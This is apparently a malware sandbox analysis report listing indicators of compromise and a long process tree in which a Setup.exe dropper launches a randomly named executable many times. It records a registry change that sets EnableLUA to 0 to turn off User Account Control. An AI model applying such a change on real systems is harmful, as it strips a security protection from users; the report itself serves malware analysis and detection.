pid Process 4732 OrtvqXJXXZ53o_eOhODIyXyC.exe 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found 3256 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 772 o9bhD_cFtB6ZOF1w10k76AMZ.exe Token: SeRestorePrivilege 4076 WerFault.exe Token: SeBackupPrivilege 4076 WerFault.exe Token: SeDebugPrivilege 1056 WerFault.exe Token: SeRestorePrivilege 1180 WerFault.exe Token: SeBackupPrivilege 1180 WerFault.exe Token: SeImpersonatePrivilege 1056 WerFault.exe Token: SeTcbPrivilege 4332 svchost.exe Token: SeTcbPrivilege 4332 svchost.exe Token: SeDebugPrivilege 5860 taskkill.exe Token: SeDebugPrivilege 2884 gBaUMdeBsiBdikEiNiY5NoXS.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 5368 powershell.exe Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found Token: SeCreatePagefilePrivilege 3256 Process not Found Token: SeShutdownPrivilege 3256 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2192 RUNDLL32.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6716 BB58.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3256 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4332 wrote to memory of 5024 4332 svchost.exe 94 PID 4332 wrote to memory of 5024 4332 svchost.exe 94 PID 4332 wrote to memory of 5024 4332 svchost.exe 94 PID 4332 wrote to memory of 4300 4332 svchost.exe 93 PID 4332 wrote to memory of 4300 4332 svchost.exe 93 PID 4332 wrote to memory of 4300 4332 svchost.exe 93 PID 4332 wrote to memory of 4636 4332 svchost.exe 92 PID 4332 wrote to memory of 4636 4332 svchost.exe 92 PID 4332 wrote to memory of 4636 4332 svchost.exe 92 PID 4332 wrote to memory of 4816 4332 svchost.exe 91 PID 4332 wrote to memory of 4816 4332 svchost.exe 91 PID 4332 wrote to memory of 4816 4332 svchost.exe 91 PID 4332 wrote to memory of 4696 4332 svchost.exe 99 PID 4332 wrote to memory of 4696 4332 svchost.exe 99 PID 4332 wrote to memory of 4712 4332 svchost.exe 100 PID 4332 wrote to memory of 4712 4332 svchost.exe 100 PID 4332 wrote to memory of 4712 4332 svchost.exe 100 PID 4332 wrote to memory of 3320 4332 svchost.exe 101 PID 4332 wrote to memory of 3320 4332 svchost.exe 101 PID 4332 wrote to memory of 3320 4332 svchost.exe 101 PID 4332 wrote to memory of 2536 4332 svchost.exe 103 PID 4332 wrote to memory of 2536 4332 svchost.exe 103 PID 4332 wrote to memory of 2536 4332 svchost.exe 103 PID 4332 wrote to memory of 2564 4332 svchost.exe 102 PID 4332 wrote to memory of 2564 4332 svchost.exe 102 PID 4332 wrote to memory of 2564 4332 svchost.exe 102 PID 4332 wrote to memory of 2484 4332 svchost.exe 86 PID 4332 wrote to memory of 2484 4332 svchost.exe 86 PID 4332 wrote to memory of 2484 4332 svchost.exe 86 PID 4332 wrote to memory of 2476 4332 svchost.exe 105 PID 4332 wrote to memory of 2476 4332 svchost.exe 105 PID 4332 wrote to memory of 2476 4332 svchost.exe 105 PID 4332 wrote to memory of 2884 4332 svchost.exe 96 PID 4332 wrote to memory of 2884 4332 svchost.exe 96 PID 4332 wrote to memory of 2884 4332 svchost.exe 96 PID 4332 wrote to memory of 772 4332 svchost.exe 97 PID 4332 wrote to memory of 772 4332 svchost.exe 97 PID 4332 wrote to memory of 4632 4332 svchost.exe 95 PID 4332 wrote to memory of 4632 4332 svchost.exe 95 PID 4332 wrote to memory of 4632 4332 svchost.exe 95 PID 4332 wrote to memory of 792 4332 svchost.exe 90 PID 4332 wrote to memory of 792 4332 svchost.exe 90 PID 4332 wrote to memory of 792 4332 svchost.exe 90 PID 4332 wrote to memory of 820 4332 svchost.exe 98 PID 4332 wrote to memory of 820 4332 svchost.exe 98 PID 4332 wrote to memory of 820 4332 svchost.exe 98 PID 4332 wrote to memory of 2580 4332 svchost.exe 88 PID 4332 wrote to memory of 2580 4332 svchost.exe 88 PID 4332 wrote to memory of 2580 4332 svchost.exe 88 PID 4332 wrote to memory of 2548 4332 svchost.exe 104 PID 4332 wrote to memory of 2548 4332 svchost.exe 104 PID 4332 wrote to memory of 2548 4332 svchost.exe 104 PID 4332 wrote to memory of 2312 4332 svchost.exe 87 PID 4332 wrote to memory of 2312 4332 svchost.exe 87 PID 4332 wrote to memory of 2312 4332 svchost.exe 87 PID 4332 wrote to memory of 3336 4332 svchost.exe 109 PID 4332 wrote to memory of 3336 4332 svchost.exe 109 PID 4332 wrote to memory of 3336 4332 svchost.exe 109 PID 4332 wrote to memory of 4720 4332 svchost.exe 89 PID 4332 wrote to memory of 4720 4332 svchost.exe 89 PID 4332 wrote to memory of 4720 4332 svchost.exe 89 PID 4332 wrote to memory of 3136 4332 svchost.exe 110 PID 4332 wrote to memory of 3136 4332 svchost.exe 110 PID 4332 wrote to memory of 3136 4332 svchost.exe 110 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" gBaUMdeBsiBdikEiNiY5NoXS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4332 -
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe"C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2484 -
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
PID:1488
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
PID:3544
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5428
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
PID:5188
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
PID:6052
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
PID:6028
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
PID:2896
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
PID:5036
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
PID:1480
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6340
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6960
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5116
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6076
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3080
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5832
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6736
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6840
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3880
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5832
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5652
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2908
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5436
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1476
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2828
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6936
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2148
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6976
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2544
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5744
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6956
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3840
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1280
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6736
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7376
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7672
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8056
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1228
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7824
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3848
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5252
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8180
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6896
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6392
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5200
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 284⤵
- Program crash
- Enumerates system info in registry
PID:3244
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3952
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7740
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7324
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7068
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:4400
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6700
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2912
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3188
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6512
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3232
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Windows security modification
PID:6356
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks BIOS information in registry
PID:4632
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2120
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5628
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:4372
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7904
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2072
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6224
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7932
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5024
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7264 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7292
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4964
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3200
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 284⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6436
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5708
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7804
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8308
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8536
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8756
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9056
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7328
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7912 -s 284⤵
- Program crash
PID:3632
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8288
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8892
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8308
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9108
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5872
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6412
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5852
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8084
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8748
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9408
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9600
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9868
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10148
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9276
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9900
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8680
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9476
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7120
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10172
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8372
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9880
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9308
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9448
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:792
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9044
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8300
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8196
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6184
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10208
-
-
